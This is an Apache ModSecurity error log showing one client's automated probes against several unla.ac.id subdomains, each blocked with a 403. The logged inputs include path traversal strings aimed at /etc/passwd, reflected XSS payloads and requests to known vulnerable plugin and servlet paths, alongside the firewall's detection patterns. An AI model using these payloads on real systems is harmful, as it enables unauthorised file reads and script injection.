[Tue Aug 29 11:51:15.838993 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAjdQTcAAAAZ"]
[Tue Aug 29 11:51:15.840846 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAm@5woAAAAH"]
[Tue Aug 29 11:51:15.843624 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAnB5UgAAAAJ"]
[Tue Aug 29 11:51:15.877357 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnMeocAAAAD"]
[Tue Aug 29 11:51:15.880786 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAm@5wsAAAAH"]
[Tue Aug 29 11:51:15.908074 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAhhc00AAAAd"]
[Tue Aug 29 11:51:15.922805 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAm5BxIAAAAA"]
[Tue Aug 29 11:51:15.924481 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAnCKysAAAAK"]
[Tue Aug 29 11:51:15.999408 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAfWOD0AAAAL"]
[Tue Aug 29 11:51:16.540549 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAm5BxMAAAAA"]
[Tue Aug 29 11:51:16.552345 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAmHd9sAAAAz"]
[Tue Aug 29 11:51:16.554638 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RMCo-f0AAAhhc04AAAAd"]
[Tue Aug 29 11:51:16.560160 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RMCo-f0AAAl4sX0AAAAf"]
[Tue Aug 29 11:51:16.580372 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAjdQTsAAAAZ"]
[Tue Aug 29 11:51:16.583389 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAkr0EkAAAAC"]
[Tue Aug 29 11:51:16.584199 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAm5BxUAAAAA"]
[Tue Aug 29 11:51:16.597428 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAnMeosAAAAD"]
[Tue Aug 29 11:51:16.600146 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAm7m9MAAAAE"]
[Tue Aug 29 11:51:16.604210 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAkr0EoAAAAC"]
[Tue Aug 29 11:51:17.557648 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAnMeowAAAAD"]
[Tue Aug 29 11:51:17.599585 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAm7m9QAAAAE"]
[Tue Aug 29 11:51:17.629249 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAmHd94AAAAz"]
[Tue Aug 29 11:51:17.733508 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAmLPSMAAAAN"]
[Tue Aug 29 11:51:17.810611 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAhhc1EAAAAd"]
[Tue Aug 29 11:51:17.816323 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15RcCo-f0AAAmHd98AAAAz"]
[Tue Aug 29 11:51:17.823950 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAm7m9UAAAAE"]
[Tue Aug 29 11:51:17.849414 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAnCKzAAAAAK"]
[Tue Aug 29 11:51:17.871663 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAm@5w8AAAAH"]
[Tue Aug 29 11:51:17.875981 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAkyyEcAAAAW"]
